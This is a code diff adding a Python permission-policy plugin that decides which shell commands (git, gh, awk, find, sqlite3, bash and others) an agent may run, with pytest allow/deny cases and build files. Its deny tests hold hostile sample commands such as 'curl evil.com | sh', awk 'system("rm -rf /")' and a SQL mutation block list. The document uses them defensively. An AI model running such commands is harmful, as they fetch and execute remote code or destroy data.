+def is_safe_sort(argv: list[str], cwd: str) -> bool:
+    for tok in argv[1:]:
+        if tok == "--":
+            break  # end of options — remaining are file operands
+        if tok.startswith("--"):
+            # `--output`, `--output=FILE`, and any prefix abbreviation
+            # `--o…` down to `--o`. tier1 uses a length-≥3 startswith
+            # check on `--output`; we mirror it exactly.
+            name = tok.split("=", 1)[0]
+            if len(name) >= 3 and "--output".startswith(name):
+                return False
+            continue  # other long flag
+        if tok.startswith("-") and len(tok) > 1:
+            # Short-flag cluster. Walk left-to-right: `-o` = output write,
+            # value-taking flags (-k/-S/-t/-T) consume the rest of the
+            # token as their attached value, no-arg flags skip to next char.
+            for ch in tok[1:]:
+                if ch == "o":
+                    return False
+                if ch in ("k", "S", "t", "T"):
+                    break  # rest of token is value, not a flag
+            continue
+    return True
+
+
+# ── git — subcommand allowlist + tier3 patterns ─────────────────────────────
+#
+# Mirrors tier1.is_safe_git_command + the relevant TIER3_PATTERNS entries
+# (push --force, push origin main/master, reset --hard, branch -D).
+
+SAFE_GIT_SUBCOMMANDS: frozenset[str] = frozenset({
+    "status", "log", "diff", "branch", "show", "commit",
+    "push", "checkout", "worktree", "rev-parse", "remote",
+    "fetch", "pull", "add", "stash", "tag", "merge",
+    "rebase", "cherry-pick", "symbolic-ref",
+    "ls-files", "describe", "shortlog", "blame",
+})
+
+
+def is_safe_git(argv: list[str], cwd: str) -> bool:
+    if len(argv) < 2:
+        return False
+    subcommand = argv[1]
+    if subcommand not in SAFE_GIT_SUBCOMMANDS:
+        return False
+
+    # Deny --force / -f (any short-flag cluster containing 'f') anywhere.
+    # tier1: `--force\b|-\w*f\b`.
+    for tok in argv[2:]:
+        if tok == "--force":
+            return False
+        if tok.startswith("-") and not tok.startswith("--") and "f" in tok[1:]:
+            return False
+
+    if subcommand == "push":
+        # push origin main/master denied (tier1 TIER3 pattern).
+        for tok in argv[2:]:
+            if tok in ("main", "master"):
+                return False
+
+    if subcommand == "branch":
+        # branch -D (or -wD any-cluster containing D) denied.
+        for tok in argv[2:]:
+            if tok.startswith("-") and not tok.startswith("--") and "D" in tok[1:]:
+                return False
+
+    return True
+
+
+# ── gh — domain+verb allowlist + api mutation guard ─────────────────────────
+#
+# Mirrors tier1.is_safe_gh_command.
+
+SAFE_GH_SUBCOMMANDS: dict[str, frozenset[str]] = {
+    "pr": frozenset({"create", "view", "list", "checkout", "diff", "checks"}),
+    "issue": frozenset({"view", "list", "edit", "comment"}),
+    "run": frozenset({"view", "list"}),
+    "repo": frozenset({"view"}),
+    "release": frozenset({"view", "list"}),
+    "workflow": frozenset({"view", "list"}),
+    "auth": frozenset({"status"}),
+}
+
+def is_safe_gh(argv: list[str], cwd: str) -> bool:
+    if len(argv) < 2:
+        return False
+
+    if argv[1] == "api":
+        # gh api is safe when read-only (no method override / no field flags).
+        # Deny any mutation flag in its bare, attached, or long form.
+        for tok in argv[2:]:
+            if tok.startswith("-X") or tok.startswith("--method"):
+                return False
+            if tok.startswith("-f") or tok.startswith("-F"):
+                # -f / -F alone (field-name follows) or -fname=value / -Fname=value
+                # (attached). Both are mutation flags.
+                return False
+            if (
+                tok.startswith("--field")
+                or tok.startswith("--raw-field")
+                or tok.startswith("--input")
+            ):
+                return False
+        return True
+
+    if len(argv) < 3:
+        return False
+    domain = argv[1]
+    verb = argv[2]
+    allowed = SAFE_GH_SUBCOMMANDS.get(domain)
+    if allowed is None:
+        return False
+    return verb in allowed
+
+
+# ── cargo — subcommand allowlist ────────────────────────────────────────────
+#
+# Mirrors tier1.is_safe_build_command's cargo branch. `cargo publish` is
+# TIER3-denied (`\\bcargo\\s+publish\\b`); other write subcommands (install)
+# absent from the allowlist deny by allow-list.
+
+SAFE_CARGO_SUBCOMMANDS: frozenset[str] = frozenset({
+    "check", "test", "clippy", "fmt", "build",
+    "clean", "doc", "bench", "tree", "metadata",
+})
+
+
+def is_safe_cargo(argv: list[str], cwd: str) -> bool:
+    if len(argv) < 2:
+        return False
+    return argv[1] in SAFE_CARGO_SUBCOMMANDS
+
+
+# ── make — closed-world target allowlist ────────────────────────────────────
+#
+# Mirrors tier1.is_safe_make_command. The pattern is FULL-anchored: exactly
+# `make <target>` with no other tokens. `make verify-bundled-skills X=1` is
+# denied by tier1 (X= overrides variables). We mirror strictly.
+
+SAFE_MAKE_TARGETS: frozenset[str] = frozenset({"verify-bundled-skills"})
+
+
+def is_safe_make(argv: list[str], cwd: str) -> bool:
+    if len(argv) != 2:
+        return False
+    return argv[1] in SAFE_MAKE_TARGETS
+
+
+# ── sqlite3 — read-only invocations only ────────────────────────────────────
+#
+# tier1 does NOT have a sqlite3 branch — it's not in SAFE_SHELL_COMMANDS, so
+# every classic invocation drops through to policy/relay. AC3 of mika#1708
+# lists sqlite3 in the initial set. We add a conservative allow: read-only
+# forms only (``sqlite3 <db> "SELECT ..."`` / ``sqlite3 --readonly ...``).
+# Any invocation touching an unrecognized SQL verb denies (mika-dev has to
+# route through relay for writes). Denies DROP/DELETE/INSERT/UPDATE at the
+# argv-substring level (also caught by tier1 TIER3 patterns on the raw
+# compound: `\\bDROP\\s+TABLE\\b`, `\\bDELETE\\s+FROM\\b`).
+
+_SQL_MUTATION_PATTERNS: tuple[str, ...] = (
+    "DROP TABLE", "DROP DATABASE", "DROP INDEX", "DROP VIEW", "DROP TRIGGER",
+    "DELETE FROM", "INSERT INTO", "UPDATE ", "ALTER TABLE",
+    "CREATE TABLE", "CREATE INDEX", "CREATE VIEW", "CREATE TRIGGER",
+    "TRUNCATE ", "REPLACE INTO",
+    "PRAGMA journal_mode = OFF", "VACUUM",
+)
+
+
+def is_safe_sqlite3(argv: list[str], cwd: str) -> bool:
+    # Reject any SQL mutation verb, case-insensitively, anywhere in argv.
+    for arg in argv[1:]:
+        upper = arg.upper()
+        for pattern in _SQL_MUTATION_PATTERNS:
+            if pattern in upper:
+                return False
+    return True
+
+
+# ── bash / sh — deny -c inline execution ────────────────────────────────────
+#
+# tier1 TIER3 denies `\bbash\s+-c\b` and `\bsh\s+-c\b`. Inline shell arg is
+# an arbitrary-code-exec primitive — the whole point of the per_spawn design
+# is to REFUSE opaque strings. `bash script.sh` / `sh script.sh` are allowed
+# (they invoke a script path; the pilot can Read that path if needed).
+
+
+def is_safe_bash(argv: list[str], cwd: str) -> bool:
+    for tok in argv[1:]:
+        if tok == "-c":
+            return False
+        # -c can also be clustered (`-ic` for interactive+cmd — rare, but tier1
+        # would catch via the raw-string regex `-c\b`). Match short-flag
+        # clusters containing 'c'.
+        if tok.startswith("-") and not tok.startswith("--") and "c" in tok[1:]:
+            return False
+    return True
+
+
+def is_safe_sh(argv: list[str], cwd: str) -> bool:
+    return is_safe_bash(argv, cwd)

--- a/tools/mika_permission_policy/pyproject.toml
+++ b/tools/mika_permission_policy/pyproject.toml
@@ -1,0 +1,35 @@
+[project]
+name = "mika-permission-policy"
+version = "0.1.0"
+description = "Mika-side per-binary safety functions for claude-pilot per-spawn evaluator (mika#1817)"
+readme = "README.md"
+requires-python = ">=3.11"
+license = { text = "Apache-2.0" }
+authors = [{ name = "Senara Solutions" }]
+# NOTE: claude-pilot's `per_spawn.PolicyFn` is a plain Callable protocol —
+# structural typing only. We DELIBERATELY do not depend on claude-pilot at the
+# package level, so this plugin can be installed alongside any cpp version
+# implementing the same protocol without a version pin coupling.
+
+[project.optional-dependencies]
+dev = [
+    "pytest>=9.1.1",
+    "ruff>=0.15.20",
+    "mypy>=2.1.0",
+]
+
+[build-system]
+requires = ["hatchling"]
+build-backend = "hatchling.build"
+
+[tool.hatch.build.targets.wheel]
+packages = ["mika_permission_policy"]
+
+[tool.ruff]
+line-length = 100
+
+[tool.ruff.lint]
+select = ["E", "F", "I", "UP", "B"]
+
+[tool.pytest.ini_options]
+testpaths = ["tests"]

--- a/tools/mika_permission_policy/tests/test_binaries.py
+++ b/tools/mika_permission_policy/tests/test_binaries.py
@@ -1,0 +1,406 @@
+"""Per-binary safety-function tests — mika#1817.
+
+Each ``TestXxx`` class exercises one safety function against known-safe and
+known-deny argv shapes. Cases are drawn from:
+
+- tier1.py existing rules (parity — what classic allows must pass here)
+- tier1.py TIER3_PATTERNS (parity — what classic denies must fail here)
+- mika#1686 evidence class (regression — the ``n=13+`` shapes that classic
+  denied on compound strings but per_spawn should allow, once the plugin is
+  wired in)
+
+All calls pass ``cwd="/tmp"`` unless the test needs a specific cwd.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from mika_permission_policy._binaries import (
+    is_safe_awk,
+    is_safe_bash,
+    is_safe_cargo,
+    is_safe_cat,
+    is_safe_find,
+    is_safe_gh,
+    is_safe_git,
+    is_safe_grep,
+    is_safe_ls,
+    is_safe_make,
+    is_safe_sed,
+    is_safe_sh,
+    is_safe_sort,
+    is_safe_sqlite3,
+)
+
+# ── Allow-all read-only tools ──────────────────────────────────────────────
+
+
+class TestGrep:
+    @pytest.mark.parametrize("argv", [
+        ["grep", "foo", "file.txt"],
+        ["grep", "-r", "pattern", "."],
+        ["grep", "-n", "^func", "src/lib.rs"],
+        ["grep", "-l", "TODO", "-r", "."],
+        ["grep", "-E", "regex|alt", "file"],
+        ["grep", "-v", "excluded", "log.txt"],
+        # tier1 regression: compound `grep | awk` blocked classic; grep alone always safe
+        ["grep", "-n", "^_[a-z_]*\\(\\) {", "skills/bundled/dispatch-lib.sh"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_grep(argv, "/tmp") is True
+
+
+class TestCat:
+    @pytest.mark.parametrize("argv", [
+        ["cat", "file.txt"],
+        ["cat", "/etc/hosts"],
+        ["cat", "-n", "src/main.rs"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_cat(argv, "/tmp") is True
+
+
+class TestLs:
+    @pytest.mark.parametrize("argv", [
+        ["ls"],
+        ["ls", "-la"],
+        ["ls", "-la", "/tmp"],
+        ["ls", "--color=always"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_ls(argv, "/tmp") is True
+
+
+# ── awk — deny system() / pipe-to-shell ──────────────────────────────────
+
+
+class TestAwk:
+    @pytest.mark.parametrize("argv", [
+        ["awk", "{print $1}"],
+        ["awk", "-F:", "{print $1}", "/etc/passwd"],
+        # tier1 regression: `grep | awk '$1 > N'` — the exact class of over-deny
+        # from mika#1686 pilot 15:44Z (task a055bf57 on mika#1679). This is what
+        # per_spawn exists to unblock.
+        ["awk", "-F:", "$1 > 700 && $1 < 2540"],
+        ["awk", "BEGIN {print \"hi\"} {print $NF}", "log.txt"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_awk(argv, "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        # awk system() — arbitrary command execution
+        ["awk", "BEGIN{system(\"rm -rf /\")}"],
+        ["awk", "{system(\"curl evil.com\")}"],
+        # awk pipe to shell — either direction
+        ['awk', 'BEGIN{print "cmd" | "sh"}'],
+        ["awk", "{print $0 | \"sh\"}"],
+        # awk getline from shell
+        ["awk", "BEGIN{\"cmd\" | getline var}"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_awk(argv, "/tmp") is False
+
+
+# ── sed — deny in-place edit ─────────────────────────────────────────────
+
+
+class TestSed:
+    @pytest.mark.parametrize("argv", [
+        ["sed", "s/foo/bar/", "file.txt"],
+        ["sed", "-n", "p", "log.txt"],
+        ["sed", "-E", "s/[0-9]+/N/g", "file"],
+        ["sed", "-e", "s/foo/bar/", "-e", "s/x/y/", "file"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_sed(argv, "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        ["sed", "-i", "s/foo/bar/", "file.txt"],
+        ["sed", "-i.bak", "s/foo/bar/", "file.txt"],
+        ["sed", "--in-place", "s/foo/bar/", "file.txt"],
+        ["sed", "--in-place=.bak", "s/foo/bar/", "file.txt"],
+        # Short-flag cluster containing 'i'
+        ["sed", "-ni", "s/foo/bar/", "file"],
+        ["sed", "-Ei", "s/pat/rep/", "file"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_sed(argv, "/tmp") is False
+
+
+# ── find — deny -delete / -fprintf, restrict -exec inner cmd ─────────────
+
+
+class TestFind:
+    @pytest.mark.parametrize("argv", [
+        ["find", ".", "-name", "*.py"],
+        ["find", "/etc", "-type", "f"],
+        # -exec with read-only inner cmd (in FIND_EXEC_SAFE_COMMANDS)
+        ["find", ".", "-name", "*.rs", "-exec", "grep", "-l", "struct", "{}", ";"],
+        ["find", ".", "-type", "f", "-exec", "cat", "{}", ";"],
+        ["find", ".", "-exec", "stat", "{}", ";"],
+        ["find", ".", "-execdir", "wc", "-l", "{}", ";"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_find(argv, "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        # -delete — filesystem mutation
+        ["find", ".", "-name", "*.tmp", "-delete"],
+        # File-write actions
+        ["find", ".", "-fprintf", "/tmp/list.txt", "%p\\n"],
+        ["find", ".", "-fprint", "/tmp/list.txt"],
+        ["find", ".", "-fprint0", "/tmp/list.txt"],
+        ["find", ".", "-fls", "/tmp/list.txt"],
+        # -exec with non-safe inner cmd
+        ["find", ".", "-exec", "rm", "{}", ";"],
+        ["find", ".", "-exec", "sh", "-c", "evil", "{}", ";"],
+        ["find", ".", "-exec", "sudo", "cat", "{}", ";"],
+        # -exec with no inner cmd (bare)
+        ["find", ".", "-exec"],
+        # -okdir with sh
+        ["find", ".", "-okdir", "sh", "-c", "hi", "{}", ";"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_find(argv, "/tmp") is False
+
+
+# ── sort — deny -o / --output ────────────────────────────────────────────
+
+
+class TestSort:
+    @pytest.mark.parametrize("argv", [
+        ["sort", "file.txt"],
+        ["sort", "-k", "2", "file"],
+        ["sort", "-u", "file"],
+        ["sort", "-nr", "file"],
+        # -T (temp dir) contains no 'o' before its value
+        ["sort", "-T/tmp", "file"],
+        # `--` end-of-options: `-o` is a filename
+        ["sort", "--", "-o"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_sort(argv, "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        ["sort", "-o", "/tmp/out.txt", "file"],
+        ["sort", "-oFILE", "input"],
+        ["sort", "--output", "/tmp/out.txt", "file"],
+        ["sort", "--output=/tmp/out.txt", "file"],
+        # Long-option abbreviations of --output
+        ["sort", "--outpu=/tmp/x", "file"],
+        ["sort", "--o=/tmp/x", "file"],
+        # Cluster containing 'o' before a value-taking flag
+        ["sort", "-uo", "/tmp/out.txt", "file"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_sort(argv, "/tmp") is False
+
+
+# ── git — subcommand allowlist + push/branch/force guards ────────────────
+
+
+class TestGit:
+    @pytest.mark.parametrize("argv", [
+        ["git", "status"],
+        ["git", "log", "-20", "--oneline"],
+        ["git", "diff", "HEAD"],
+        ["git", "branch", "--show-current"],
+        ["git", "show", "HEAD:file.txt"],
+        ["git", "commit", "-m", "fix: foo"],
+        ["git", "push", "origin", "feat/branch"],  # not main/master
+        ["git", "checkout", "-b", "new-feature"],
+        ["git", "worktree", "add", "..", "branch"],
+        ["git", "rev-parse", "HEAD"],
+        ["git", "fetch", "origin"],
+        ["git", "add", "src/"],
+        ["git", "stash"],
+        ["git", "blame", "src/lib.rs"],
+        ["git", "ls-files"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_git(argv, "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        # Subcommand not in allowlist
+        ["git", "reset", "--hard"],
+        ["git", "reset", "HEAD~1"],
+        ["git", "clone", "https://evil.com/repo"],
+        ["git", "gc", "--aggressive"],
+        # push --force / -f
+        ["git", "push", "--force", "origin", "feat/branch"],
+        ["git", "push", "-f", "origin", "feat/branch"],
+        ["git", "push", "-fu", "origin", "feat"],
+        # push to main/master
+        ["git", "push", "origin", "main"],
+        ["git", "push", "origin", "master"],
+        # branch -D
+        ["git", "branch", "-D", "old-branch"],
+        ["git", "branch", "-wD", "old-branch"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_git(argv, "/tmp") is False
+
+
+# ── gh — domain+verb allowlist + api mutation guard ──────────────────────
+
+
+class TestGh:
+    @pytest.mark.parametrize("argv", [
+        ["gh", "pr", "view", "1234"],
+        ["gh", "pr", "list", "--state", "open"],
+        ["gh", "pr", "checks", "1234"],
+        ["gh", "pr", "diff", "1234"],
+        ["gh", "issue", "view", "42"],
+        ["gh", "issue", "list", "--label", "bug"],
+        ["gh", "issue", "comment", "42", "-b", "thanks"],
+        ["gh", "issue", "edit", "42", "--add-label", "ready"],
+        ["gh", "repo", "view"],
+        ["gh", "run", "view", "1234567"],
+        ["gh", "auth", "status"],
+        # gh api read-only forms
+        ["gh", "api", "/repos/foo/bar/pulls/1"],
+        ["gh", "api", "repos/foo/bar/issues"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_gh(argv, "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        # Verb not allowed
+        ["gh", "pr", "merge", "1234"],
+        ["gh", "pr", "close", "1234"],
+        ["gh", "issue", "delete", "42"],
+        ["gh", "issue", "close", "42"],
+        # Domain not allowed
+        ["gh", "label", "delete", "foo"],
+        ["gh", "label", "edit", "foo"],
+        ["gh", "secret", "set", "TOKEN"],
+        # gh api mutation
+        ["gh", "api", "-X", "POST", "/repos/foo/bar/issues"],
+        ["gh", "api", "-XPOST", "/repos/foo/bar/issues"],
+        ["gh", "api", "--method", "PATCH", "/repos/foo/bar/issues/1"],
+        ["gh", "api", "--method=DELETE", "/repos/foo/bar/labels/foo"],
+        ["gh", "api", "/x", "-f", "name=value"],
+        ["gh", "api", "/x", "-F", "name=value"],
+        ["gh", "api", "/x", "--field", "name=value"],
+        ["gh", "api", "/x", "--raw-field", "name=value"],
+        ["gh", "api", "/x", "--input", "payload.json"],
+        # auth verb not `status`
+        ["gh", "auth", "login"],
+        ["gh", "auth", "token"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_gh(argv, "/tmp") is False
+
+
+# ── cargo — subcommand allowlist ─────────────────────────────────────────
+
+
+class TestCargo:
+    @pytest.mark.parametrize("argv", [
+        ["cargo", "check"],
+        ["cargo", "test"],
+        ["cargo", "clippy", "--", "-D", "warnings"],
+        ["cargo", "fmt", "--check"],
+        ["cargo", "build", "--release"],
+        ["cargo", "doc", "--no-deps"],
+        ["cargo", "tree"],
+        ["cargo", "metadata", "--format-version", "1"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_cargo(argv, "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        # tier1 TIER3 deny — cargo publish
+        ["cargo", "publish"],
+        ["cargo", "publish", "--dry-run"],
+        # cargo install — writes to ~/.cargo/bin
+        ["cargo", "install", "somepkg"],
+        # cargo run — arbitrary code exec
+        ["cargo", "run", "--", "arg"],
+        # Bare cargo
+        ["cargo"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_cargo(argv, "/tmp") is False
+
+
+# ── make — closed-world targets ─────────────────────────────────────────
+
+
+class TestMake:
+    def test_verify_bundled_skills_allowed(self):
+        assert is_safe_make(["make", "verify-bundled-skills"], "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        ["make", "clean"],
+        ["make", "deploy"],
+        ["make", "install"],
+        ["make", "build"],
+        # Trailing tokens — tier1's fully-anchored regex denies these.
+        ["make", "verify-bundled-skills", "V=1"],
+        ["make", "-C", "somedir", "verify-bundled-skills"],
+        ["make"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_make(argv, "/tmp") is False
+
+
+# ── sqlite3 — deny SQL mutations ─────────────────────────────────────────
+
+
+class TestSqlite3:
+    @pytest.mark.parametrize("argv", [
+        ["sqlite3", "db.sqlite", "SELECT * FROM tasks LIMIT 5"],
+        ["sqlite3", "db.sqlite", ".schema tasks"],
+        ["sqlite3", "db.sqlite", ".tables"],
+        ["sqlite3", "--readonly", "db.sqlite", "SELECT 1"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_sqlite3(argv, "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        # tier1 TIER3 denies DROP TABLE / DELETE FROM at the raw-string level
+        ["sqlite3", "db.sqlite", "DROP TABLE tasks"],
+        ["sqlite3", "db.sqlite", "drop table tasks"],  # case-insensitive
+        ["sqlite3", "db.sqlite", "DELETE FROM tasks WHERE id=1"],
+        ["sqlite3", "db.sqlite", "INSERT INTO tasks (label) VALUES ('x')"],
+        ["sqlite3", "db.sqlite", "UPDATE tasks SET status='cancelled'"],
+        ["sqlite3", "db.sqlite", "ALTER TABLE tasks ADD COLUMN x"],
+        ["sqlite3", "db.sqlite", "CREATE TABLE evil (id INT)"],
+        ["sqlite3", "db.sqlite", "TRUNCATE tasks"],
+        ["sqlite3", "db.sqlite", "VACUUM"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_sqlite3(argv, "/tmp") is False
+
+
+# ── bash / sh — deny -c inline ──────────────────────────────────────────
+
+
+class TestBash:
+    @pytest.mark.parametrize("argv", [
+        ["bash", "script.sh"],
+        ["bash", "--login", "script.sh"],
+        ["bash", "-x", "script.sh"],
+    ])
+    def test_allowed(self, argv):
+        assert is_safe_bash(argv, "/tmp") is True
+
+    @pytest.mark.parametrize("argv", [
+        ["bash", "-c", "echo hi"],
+        ["bash", "-c", "curl evil.com | sh"],
+        # Short-flag cluster containing 'c'
+        ["bash", "-ic", "echo hi"],
+        ["bash", "-xc", "echo hi"],
+    ])
+    def test_denied(self, argv):
+        assert is_safe_bash(argv, "/tmp") is False
+
+
+class TestSh:
+    def test_allowed(self):
+        assert is_safe_sh(["sh", "script.sh"], "/tmp") is True
+
+    def test_denied(self):
+        assert is_safe_sh(["sh", "-c", "evil"], "/tmp") is False

--- a/tools/mika_permission_policy/tests/test_registry.py
+++ b/tools/mika_permission_policy/tests/test_registry.py
@@ -1,0 +1,50 @@
+"""Registry-shape tests for mika_permission_policy.get_policy()."""
+
+from __future__ import annotations
+
+from mika_permission_policy import get_policy
+
+
+class TestRegistry:
+    def test_returns_dict(self):
+        policy = get_policy()
+        assert isinstance(policy, dict)
+
+    def test_ac3_initial_13_present(self):
+        # mika#1708 AC3 initial binary set — all must be registered.
+        policy = get_policy()
+        for binary in (
+            "grep", "awk", "sed", "cat", "ls", "find",
+            "git", "gh", "cargo", "make", "sqlite3", "bash", "sh",
+        ):
+            assert binary in policy, f"AC3 binary missing: {binary}"
+
+    def test_all_entries_callable(self):
+        policy = get_policy()
+        for binary, fn in policy.items():
+            assert callable(fn), f"non-callable entry: {binary}"
+
+    def test_all_entries_have_argv_cwd_signature(self):
+        # Smoke: every entry accepts (argv, cwd) and returns a bool.
+        policy = get_policy()
+        for binary, fn in policy.items():
+            result = fn([binary], "/tmp")
+            assert isinstance(result, bool), (
+                f"{binary} returned {type(result).__name__}, expected bool"
+            )
+
+    def test_grep_family_shares_impl(self):
+        policy = get_policy()
+        assert policy["egrep"] is policy["grep"]
+        assert policy["fgrep"] is policy["grep"]
+
+    def test_no_op_family_shares_impl(self):
+        policy = get_policy()
+        # echo/printf/true/false/: — all share is_safe_no_op
+        assert policy["printf"] is policy["echo"]
+        assert policy["true"] is policy["echo"]
+        assert policy["false"] is policy["echo"]
+
+    def test_test_bracket_share_impl(self):
+        policy = get_policy()
+        assert policy["["] is policy["test"]

--- a/tools/mika_permission_policy/uv.lock
+++ b/tools/mika_permission_policy/uv.lock
@@ -1,0 +1,308 @@
+version = 1
+revision = 3
+requires-python = ">=3.11"
+resolution-markers = [
+    "python_full_version >= '3.15'",
+    "python_full_version < '3.15'",
+]
+
+[[package]]
+name = "ast-serialize"
+version = "0.6.0"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/58/ad/0d70a3a2d6e01968d985415259e8ec7ad3f777903f9b1c1f3c8c44642c60/ast_serialize-0.6.0.tar.gz", hash = "sha256:aadd3ffcf4858c9726bf3515f7b199c7eadbe504f96028e4a87172c0da65a8fe", size = 61489, upload-time = "2026-06-30T20:02:55.555Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/3f/12/3e5f575f156555547c250a8b0d1347517a3a20fc7f4492e9703a69d4f45e/ast_serialize-0.6.0-cp314-cp314t-macosx_10_12_x86_64.whl", hash = "sha256:a7520b672827885bafeae7501f684d14d47d17e5f45256f9df547686cca52264", size = 1177640, upload-time = "2026-06-30T20:02:06.708Z" },
+    { url = "https://files.pythonhosted.org/packages/a2/a4/921a9e27951627983b0f368859ea00f8330a551dc0bf4c2fdcb11855a98b/ast_serialize-0.6.0-cp314-cp314t-macosx_11_0_arm64.whl", hash = "sha256:a14191beec7e0c078d2fc1f6edc0aee88bcd4db9f18e1bc9f8052b559c22dddc", size = 1168111, upload-time = "2026-06-30T20:02:08.366Z" },
+    { url = "https://files.pythonhosted.org/packages/00/69/950cf404de7b8782cf95e5c1237e25e2aa46177b287f39f9eeddf481fd6f/ast_serialize-0.6.0-cp314-cp314t-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:32ef62ec34cf6be20ad77d4799556638fbdf187f3ae10698dfb20ef9f2c89516", size = 1227656, upload-time = "2026-06-30T20:02:09.843Z" },
+    { url = "https://files.pythonhosted.org/packages/4c/a8/46f8f6a6479d9d2273980957bb091a506c55f5b95d3c029ee58518a78407/ast_serialize-0.6.0-cp314-cp314t-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:13b7769970a39983b0adf2f38917b1cd3b8946f76df045756c3d741bc689f089", size = 1227706, upload-time = "2026-06-30T20:02:11.367Z" },
+    { url = "https://files.pythonhosted.org/packages/b7/b9/9ac415bda0a40e49eab8fea3b2741c19c98bb84d57d62c4cfc6230eb67be/ast_serialize-0.6.0-cp314-cp314t-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6f7a408601bb3edaefb3bc67a4c01f5235e3253653b6a5729a2ee2382b35341c", size = 1431705, upload-time = "2026-06-30T20:02:12.737Z" },
+    { url = "https://files.pythonhosted.org/packages/e5/06/8807115d441444879f7561b5eede5ac18fc80392f11826d61ccf31f503b1/ast_serialize-0.6.0-cp314-cp314t-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8670bfa51208a2c0c8d138928e40e998fab158f9200d53bb80c088b5b8eda7b8", size = 1249533, upload-time = "2026-06-30T20:02:14.571Z" },
+    { url = "https://files.pythonhosted.org/packages/3e/c0/c2ba82ef9618650357d9421a1fdb27ffec862a7f57e8e2de82a3ccd11e12/ast_serialize-0.6.0-cp314-cp314t-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a4826809eb8597a8cd59fd924b6d7c285b8969a1e0007e2cb652cab62376270f", size = 1252619, upload-time = "2026-06-30T20:02:16.219Z" },
+    { url = "https://files.pythonhosted.org/packages/0f/a7/fa31d52dd4102cede29fb9634e98d214129b2783b4f95528c6dc6a8f6587/ast_serialize-0.6.0-cp314-cp314t-manylinux_2_31_riscv64.whl", hash = "sha256:577a6c189068686869f5f1ddc38363f3ae1808a4753b577266f9202071a7bb66", size = 1242983, upload-time = "2026-06-30T20:02:17.813Z" },
+    { url = "https://files.pythonhosted.org/packages/b1/20/ddf742b5ad3c4bafd3466f2265037cfd99bc1b9a5ee46a5d58c90d523242/ast_serialize-0.6.0-cp314-cp314t-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:085de7f62dc9cc247eb01e965a362707d1d90b1d89a82c5bf78301a60a3c417b", size = 1296148, upload-time = "2026-06-30T20:02:19.146Z" },
+    { url = "https://files.pythonhosted.org/packages/24/cb/9f6f217cce8b3b632c5568b478d195a35e79dce4dbe309438cb89ba6ea4f/ast_serialize-0.6.0-cp314-cp314t-musllinux_1_2_aarch64.whl", hash = "sha256:9f8a8b78b13173de6a9ec22111d9be674874cd5bdccda04f14ae5ebc2bef403a", size = 1403826, upload-time = "2026-06-30T20:02:20.696Z" },
+    { url = "https://files.pythonhosted.org/packages/2d/f8/9d16d4f0107a183924425cc0e7618d8bf76f96b45afa9ff19f924ed1ad57/ast_serialize-0.6.0-cp314-cp314t-musllinux_1_2_armv7l.whl", hash = "sha256:f2ff3baffc3a29c1f15bc9098aa0c09763410262d5e6cef42116f7356c184554", size = 1502943, upload-time = "2026-06-30T20:02:22.034Z" },
+    { url = "https://files.pythonhosted.org/packages/80/dd/bbc1c38756350dddf7e24acae1c9482ef42051c267417e019aecc1ed4075/ast_serialize-0.6.0-cp314-cp314t-musllinux_1_2_i686.whl", hash = "sha256:0067b25fce104eaae5b88383de9ab803faeb671831e14ca698b771b356e2600f", size = 1497632, upload-time = "2026-06-30T20:02:23.517Z" },
+    { url = "https://files.pythonhosted.org/packages/42/7e/9daffefcf5b97e6bb4c3e0b3c024c1aee9722f23d3cf7cd2ff80d6fb4a40/ast_serialize-0.6.0-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:c617417f9cbb0cb144f6283c3cbe0d2e0f01beaf9f608f662b21191058a626ec", size = 1448858, upload-time = "2026-06-30T20:02:24.889Z" },
+    { url = "https://files.pythonhosted.org/packages/e5/1f/f9baaab81a677ea0af7d2458cac2f94ebcc85958f8a3c15ba9d9e5dab653/ast_serialize-0.6.0-cp314-cp314t-win32.whl", hash = "sha256:5337cb256dcea3df9288205213d1601581536526b8f4da44b6974f1180f3252a", size = 1052600, upload-time = "2026-06-30T20:02:26.263Z" },
